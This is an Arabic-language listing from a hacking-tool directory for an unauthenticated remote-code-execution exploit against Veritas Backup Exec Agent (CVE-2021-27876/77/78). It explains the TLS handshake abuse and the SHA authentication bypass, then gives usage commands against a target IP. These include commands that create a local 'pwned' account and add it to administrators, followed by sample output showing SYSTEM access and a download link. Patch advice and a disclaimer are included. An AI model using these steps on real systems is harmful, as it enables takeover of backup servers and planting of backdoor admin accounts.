Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/wingerbijay/cve-2021-27876
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةالمصادقة
GitHubwingerbijay/cve-2021-27876

CVE-2021-27876

استغلال RCE غير مصادق عليه لـ Veritas Backup Exec Agent (CVE-2021-27876/77/78) — تجاوز مصادقة SHA إلى SYSTEM عبر NDMP

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-27876

استغلال تنفيذ أوامر عن بُعد غير مصادق عليه لوكيل Veritas Backup Exec (CVE-2021-27876/77/78) — تجاوز مصادقة SHA إلى SYSTEM عبر NDMP

الثغرات

CVEالوصفCVSS 3.1
CVE-2021-27876تجاوز المصادقة عبر التلاعب بتجزئة SHA في بروتوكول NDMP9.8 حرجة
CVE-2021-27877قراءة ملفات عشوائية غير مصادق عليها عبر NDMP9.8 حرجة
CVE-2021-27878تنفيذ أوامر نظام تشغيل عشوائي عبر NDMP_EXECUTE_COMMAND9.8 حرجة

إشعار: Veritas VTS21-003

الإصدارات المتأثرة

  • Backup Exec 16.x
  • Backup Exec 20.x
  • Backup Exec 21.x ≤ 21.2 (إصدار الوكيل ≤ 9.3)

تم الإصلاح في: Backup Exec 21.3 والإصدارات الأحدث.


كيفية العمل

وكيل Veritas Backup Exec يستمع على TCP/10000 ويتحدث بروتوكول NDMP (بروتوكول إدارة بيانات الشبكة). يستغل الاستغلال ثلاث نقاط ضعف:

  1. إساءة استخدام مصافحة TLS — يطلب الوكيل CSR أثناء مفاوضات TLS المخصصة. يقوم الاستغلال بإنشاء CA محلي، وتوقيع CSR الخاص بالوكيل، وإكمال المصافحة، وترقية المقبس إلى TLS دون أي سر مشترك مسبق.

  2. تجاوز مصادقة SHA (CVE-2021-27876) — تحسب مصادقة SHA لـ NDMP SHA256('\x00' * 64 + challenge). نظرًا لأن كلمة المرور تُسبق ككتلة محشوة بصفر 64 بايت ولا يوجد التحقق من صحة مادة كلمة المرور من جانب الخادم، يمكن لأي عميل المصادقة كـ Administrator دون معرفة كلمة المرور.

  3. NDMP_EXECUTE_COMMAND (CVE-2021-27878) — بمجرد المصادقة، يقوم نوع رسالة NDMP_EXECUTE_COMMAND بتشغيل أوامر نظام تشغيل عشوائية كـ NT AUTHORITY\SYSTEM. يُعاد توجيه الإخراج إلى C:\Windows\Temp\_be_out.txt ويُقرأ عبر NDMP_FILE_READ.


المتطلبات

Python 3.8+

في التوزيعات الحديثة، يتم وضع علامة "مُدار خارجيًا" على Python (PEP 668)، لذا قم بتثبيت التبعية في بيئة افتراضية:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate
pip install cryptography

الاستخدام

python3 be_rce.py

أمثلة:

root@kitploit:~
# تأكيد وصول SYSTEM
python3 be_rce.py 10.10.10.50 "whoami"

# تفريغ اسم المضيف والمجال
python3 be_rce.py 10.10.10.50 "whoami /all"

# إضافة مستخدم محلي كمسؤول
python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"

مثال على الإخراج:

root@kitploit:~
[*] Connecting to 10.10.10.50:10000
[*] NDMP version: 9
[+] NDMP connection opened
[*] Generating CA certificate
[*] Got agent CSR (1024 bytes)
[*] Signed agent CSR and sent back
[*] SSL_HANDSHAKE CONNECT sent
[*] Upgrading to TLS
[+] TLS established
[*] Requesting SHA challenge
[*] Got 64-byte SHA challenge
[+] SHA authentication bypassed!
[*] Executing: whoami
[+] Command output:
────────────────────────────────────────
nt authority\system
────────────────────────────────────────

الإصلاح

  • قم بترقية وكيل Veritas Backup Exec إلى 21.3 أو أحدث على جميع المضيفين
  • قم بتقييد TCP/10000 لمضيفي إدارة النسخ الاحتياطي المصرح لهم عبر جدار الحماية للمضيف وقوائم التحكم في الوصول إلى الشبكة
  • قم بتدقيق جميع المضيفين الذين يشغلون وكيل Backup Exec عبر بيئتك

المراجع

  • https://www.veritas.com/support/en_US/security/VTS21-003
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27876
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27877
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27878
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

قانوني

تم توفير هذه الأداة لاختبار الاختراق المصرح به والبحث الأمني فقط. الاستخدام ضد الأنظمة دون إذن كتابي صريح غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.

تنزيل الأداة